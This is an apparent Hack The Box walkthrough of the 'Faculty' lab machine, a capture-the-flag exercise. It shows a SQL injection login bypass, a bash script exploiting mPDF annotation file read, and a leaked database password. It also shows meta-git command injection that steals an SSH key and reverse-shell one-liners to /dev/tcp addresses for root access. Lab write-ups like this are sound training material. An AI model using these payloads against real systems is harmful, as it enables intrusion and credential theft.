HTB - Faculty - Walkthrough [ hackthebox ]

TL;DR

NETWORK

SCANS

feroxbuster --url http://faculty.htb --wordlist /usr/share/wordlists/dirb/big.txt --silent -x php,txt

ENUMERATION

discovery

ffuf -w /usr/share/wordlists/dirb/big.txt -u http://faculty.htb/admin/ajax.php\?action\=FUZZ -v -fs 0

curl -X POST -F "firstname=tom&lastname=tom&[email protected]&password=tom123" http://faculty.htb/admin/ajax.php\?action\=signup

SQLi

SQLMap

Let’s record the request in a file and run sqlmap

sqlmap has identified the field username as vulnerable

We can see our user “tom” in the database, created with the following POST

curl -X POST -d "firstname=tom&lastname=tom&[email protected]&password=tom123&bio=whatver&login_alumnus_id=10" http://faculty.htb/admin/ajax.php\?action\=signup

Unfortunately, for some unknown reasons this user couldn’t connect to the site

FOOTHOLD

Admin login page

Using the payload jyot' or 1=1# in user and password field bypass the admin login page

PDF download

Fuzzing

We have an interesting error

Looking into one of the PDF proprieties we have found the software/script responsible for the generation of the PDFs mPDF 6.0

Exploit

Looking into mPDF we can see that it is inject HTML code into a PDF document that is generated by mPDF like described here https://github.com/mpdf/mpdf/issues/356 More details on this vulnerability can be found on this blog https://medium.com/@jonathanbouman/local-file-inclusion-at-ikea-com-e695ed64d82f

Thanks to this article, we crafted a quick bash script to exploit the arbitrary file read by sending the following payload (url encoded 2 times then base64 encoded):

<annotation file="FILE_TO_READ" content="FILE_TO_READ" icon="Graph" title="Attached File: FILE_TO_READ" pos-x="195" />

The bash script

COOKIE='bhbesvscj7t11kqlslcoupihe7' 
MFILE='/etc/passwd'
TMP="<annotation file=\"$MFILE\" content=\"${MFILE}\" icon=\"Graph\" title=\"Attached File: ${MFILE}\" pos-x=\"195\" />";
ENCODED_TMP="$(php -r 'echo rawurlencode($argv[1]);' -- "$TMP")";
ENCODED_TMP="$(php -r 'echo rawurlencode($argv[1]);' -- "$ENCODED_TMP")";
BASE64=`echo -n "$ENCODED_TMP" | base64`;
PDF=`curl --silent -X POST -d "pdf=$BASE64" -b "PHPSESSID=$COOKIE" http://faculty.htb/admin/download.php`;
echo "\n\ncurl -b 'PHPSESSID=$COOKIE' -O http://faculty.htb/mpdf/tmp/$PDF"

Enumeration

Using the script we managed to retrieve the file /etc/passwd which gave us an idea of the users available on the machine

Using a search on internet we found out the file structure of “School faculty scheduling” https://www.campcodes.com/downloads/school-faculty-scheduling-system-using-php-mysql-source-code/ and went after the following file /var/www/scheduling/admin/db_connect.php

which revealed the database password

sched:Co.met06aci.dly53ro.per

Low access as user gbyolo

We were able to get an SSH access to the machine using the password found on the previous step with the user gbyolo

PRIV ESCALATION

Enum

We are able to run the binary meta-git as user developer

We can run command as developer with

sudo -u developer meta-git

Retrieve user’s developer SSH key

A bit of googling gave us https://github.com/advisories/GHSA-qcff-ffx3-m25c

All versions of meta-git are vulnerable to Command Injection. The package fails to sanitize input and passes it directly to an exec call, which may allow attackers to execute arbitrary code in the system. The clone command is vulnerable through the branch name.

According this link we can do

meta-git clone 'sss||touch HACKED' # *HACKED* file is created

where touch HACKED would be an unverified command

As shown by the following image, the exploit runs as developer

sudo -u developer meta-git clone "sss||cat /home/developer/.ssh/id_rsa"

Using this SSH key we can now access user developer account

Root access

Using pspy in order to snoop into the processes we can see that the script sendmail.sh is being called multiple times (probably on cron)

knowing that information, let’s use sed to replace the mail in the script with our payload

echo '/bin/bash -c "/bin/bash -i >& /dev/tcp/10.10.16.9/1235 0>&1"' > sendmail.sh

export PID=$(ps aux | grep "^root.*python3" | awk '{print $2}')

gdb -p $PID

call (void)system("bash -c 'bash -i >& /dev/tcp/10.10.x.x/9001 0>&1'")

call (void)system(“bash -c ‘bash -i >& /dev/tcp/10.10.16.9/9001 0>&1’”)